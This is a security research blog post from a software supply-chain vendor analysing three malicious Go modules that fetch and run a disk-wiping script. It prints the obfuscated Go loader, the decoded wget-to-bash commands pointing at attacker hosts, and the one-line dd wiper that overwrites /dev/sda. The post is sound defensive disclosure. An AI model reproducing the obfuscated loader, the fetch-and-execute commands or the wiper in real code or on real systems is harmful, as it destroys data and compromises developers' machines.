🚀 Big News: Socket Acquires Coana to Bring Reachability Analysis to Every Appsec Team.Learn more
Socket
Sign inDemoInstall
Socket

Research

wget to Wipeout: Malicious Go Modules Fetch Destructive Payload

Socket's research uncovers three dangerous Go modules that contain obfuscated disk-wiping malware, threatening complete data loss.

wget to Wipeout: Malicious Go Modules Fetch Destructive Payload

Kush Pandya

May 1, 2025

A single line of obfuscated Go code wiped entire disks clean. Could your project be next?

Socket’s Threat Research Team uncovered a stealthy and highly destructive supply-chain attack targeting developers using Go modules. Attackers leveraged obfuscation to deliver a catastrophic disk-wiper payload.

Go’s Open Ecosystem: A Double-Edged Sword#

The Go ecosystem, valued for its simplicity, transparency, and flexibility, has exploded in popularity. With over 2 million modules available, developers rely heavily on public repositories like GitHub. However, this openness is precisely what attackers exploit.

  • No Central Gatekeeping: Developers freely source modules directly from GitHub repositories, trusting the naming conventions implicitly.
  • Prime Target for Typosquatting: Minimal namespace validation enables attackers to masquerade malicious modules as popular libraries.

Introduction: The Silent Threat#

In April 2025, we detected an attack involving three malicious Go modules which employ similar obfuscation techniques:

  • github[.]com/truthfulpharm/prototransform
  • github[.]com/blankloggia/go-mcp
  • github[.]com/steelpoor/tlsproxy

Despite appearing legitimate, these modules contained highly obfuscated code designed to fetch and execute remote payloads. Socket’s scanners flagged the suspicious behaviors, leading us to a deeper investigation.

Socket scanner alerting malicious Go modules leveraging obfuscation

🔗 Namespace Confusion: A Breeding Ground for Malicious Go Modules#

Unlike centralized package managers such as npm or PyPI, the Go ecosystem's decentralized nature where modules are directly imported from GitHub repositories creates substantial confusion. Developers often encounter multiple similarly named modules with entirely different maintainers, as shown below. This ambiguity makes it exceptionally challenging to identify legitimate packages from malicious impostors, even when packages aren't strictly "typosquatted." Attackers exploit this confusion, carefully crafting their malicious module namespaces to appear trustworthy at a glance, significantly increasing the likelihood developers inadvertently integrate destructive code into their projects.

Multiple similarly named Go modules creating namespace confusion, highlighting the difficulty of selecting trusted dependencies

Malicious Modules & Their Obfuscated Payloads#

Attackers cleverly masked their intent through array-based string obfuscation and dynamic payload execution—a method we previously explored in our "Obfuscation 101" blog. Here’s how one malicious module (truthfulpharm/prototransform) executed this trick:

func eGtROk() error {
	DmM := []string{"4", "/", " ", "e", "/", "g", "d", "3", "6", " ", "4", "w", "/", "7", "d", ".", "O", " ", "s", "b", "5", "3", "/", "c", "t", "0", "4", "c", "h", " ", "f", "a", "t", "/", "i", "/", "1", "b", "n", "p", "t", "7", "d", "-", "&", ":", "4", "e", "t", "4", "-", "d", "4", "g", "o", "d", "s", "e", "r", "7", ".", "/", "|", ".", " ", "1", "h", " "}
	pBRPhsxN := runtime.GOOS == "linux"
	bcbGOM := "/bin/sh"
	vpqIU := "-c"
	PWcf := DmM[11] + DmM[5] + DmM[47] + DmM[32] + DmM[29] + DmM[50] + DmM[16] + DmM[2] + DmM[43] + DmM[17] + DmM[66] + DmM[24] + DmM[40] + DmM[39] + DmM[45] + DmM[12] + DmM[4] + DmM[36] + DmM[49] + DmM[13] + DmM[15] + DmM[46] + DmM[20] + DmM[63] + DmM[0] + DmM[26] + DmM[60] + DmM[52] + DmM[65] + DmM[22] + DmM[56] + DmM[48] + DmM[54] + DmM[58] + DmM[31] + DmM[53] + DmM[3] + DmM[35] + DmM[51] + DmM[57] + DmM[7] + DmM[59] + DmM[21] + DmM[14] + DmM[25] + DmM[55] + DmM[30] + DmM[33] + DmM[23] + DmM[27] + DmM[42] + DmM[41] + DmM[19] + DmM[10] + DmM[8] + DmM[6] + DmM[67] + DmM[62] + DmM[9] + DmM[1] + DmM[37] + DmM[34] + DmM[38] + DmM[61] + DmM[18] + DmM[28] + DmM[64] + DmM[44]
	if pBRPhsxN {
		exec.Command(bcbGOM, vpqIU, PWcf).Start()
	}

	return nil
}

var GEeEQNj = eGtROk()


Note: The payload specifically targets Linux systems, checking the OS before execution, ensuring that the attack impacts primarily Linux-based servers or developer environments.

Decoded Malicious Commands:

# prototransform module payload
wget -O - <https://vanartest>[.]website/storage/de373d0df/a31546bf | /bin/bash &

# go-mcp module payload
wget -O - <https://kaspamirror>[.]icu/storage/de373d0df/a31546bf | /bin/bash &

# tlsproxy module payload
wget -O - <http://147.45.44>[.]41/storage/de373d0df/ccd7b46d | /bin/sh &

Decoded Intent:

  • Fetches a destructive shell script (done.sh) from the attacker-controlled URL:
    • https://vanartest[.]website/storage/de373d0df/a31546bf
  • Executes it immediately, leaving virtually no time for response or recovery.

Similar URLs extracted from the other malicious modules (now offline):

  • https://kaspamirror[.]icu/storage/de373d0df/a31546bf
  • http://147.45.44[.]41/storage/de373d0df/ccd7b46d
This isn't the first time we've observed malicious Go modules employing similar obfuscation techniques. Check out our previous research: "Typosquatted Go Packages Deliver Malware Loader"

⚠️ Disk-Wiping Payload: An Irreversible Attack#

Upon executing the payload retrieved from one of these URLs, we discovered a devastating shell script:

done.sh – The destructive payload:

#!/bin/bash
dd if=/dev/zero of=/dev/sda bs=1M conv=fsync
sync

What does this payload actually do?

The command above executes dd, a powerful Unix utility, instructing it to copy zeros (/dev/zero) directly onto the primary storage device (/dev/sda). Here's why that's catastrophic:

  • /dev/sda (the primary disk) typically represents the primary storage device of a Linux system. This is usually where the operating system, user files, databases, configurations, and critical system data reside.
  • Writing zeros onto this disk doesn't just delete files—it systematically overwrites every byte of data, making recovery virtually impossible.
  • By populating the entire disk with zeros, the script completely destroys the file system structure, operating system, and all user data, rendering the system unbootable and unrecoverable.

This destructive method ensures no data recovery tool or forensic process can restore the data, as it directly and irreversibly overwrites it.

This malicious script leaves targeted Linux servers or developer environments entirely crippled, highlighting the extreme danger posed by modern supply-chain attacks that can turn seemingly trusted code into devastating threats.

Real-World Impact: A Devastating Threat#

Even minimal exposure to these modules could result in:

  • Complete Data Loss: The irreversible wiping of critical systems and servers.
  • Operational Downtime: Catastrophic business disruptions due to unrecoverable data and infrastructure.
  • Financial and Reputational Damage: Immediate and severe impacts to affected organizations.

The extreme nature of this attack underscores the critical importance of proactive, layered defenses within software supply chains.

Outlook and Recommendations#

The discovery of the malicious Go modules (prototransform, go-mcp, and tlsproxy) highlights the persistent and evolving threats within open source ecosystems. Attackers exploit confusion around namespace validity and developers’ implicit trust in publicly sourced code, positioning themselves to execute destructive payloads that can irreversibly damage organizational infrastructure.

Secure software development practices must evolve to address these sophisticated threats. Proactive code audits, automated dependency analysis, and continuous runtime monitoring must become integral to the software development lifecycle, particularly for projects heavily reliant on external open source dependencies.

Socket's security suite—our free GitHub app, CLI tool, and browser extension—provides real-time threat detection and prevention. When integrated into development processes, these tools proactively block malicious packages, ensuring vulnerabilities are mitigated before they reach production environments.

Continuous vigilance, robust dependency management, and proactive security integration remain essential to safeguarding software supply chains against future threats.

📌 Indicators of Compromise (IOCs)#

Malicious Modules

  • github[.]com/truthfulpharm/prototransform
  • github[.]com/blankloggia/go-mcp
  • github[.]com/steelpoor/tlsproxy

Malicious URLs (Payload Hosting)

  • https://vanartest[.]website/storage/de373d0df/a31546bf
  • https://kaspamirror[.]icu/storage/de373d0df/a31546bf (Offline now)
  • http://147.45.44[.]41/storage/de373d0df/ccd7b46d (Offline now)

MITRE ATT&CK Techniques#

  • T1195 — Supply Chain Compromise
  • T1485 — Data Destruction (Disk Wiper)
  • T1027 — Obfuscated Files or Information
  • T1059.004 — Command and Scripting Interpreter (Unix Shell)
  • T1036 — Masquerading (Namespace Typosquatting)

Subscribe to our newsletter

Get notified when we publish new security blog posts!

Try it now

Ready to block malicious and vulnerable dependencies?

Install GitHub AppBook a demo

Related posts

Back to all posts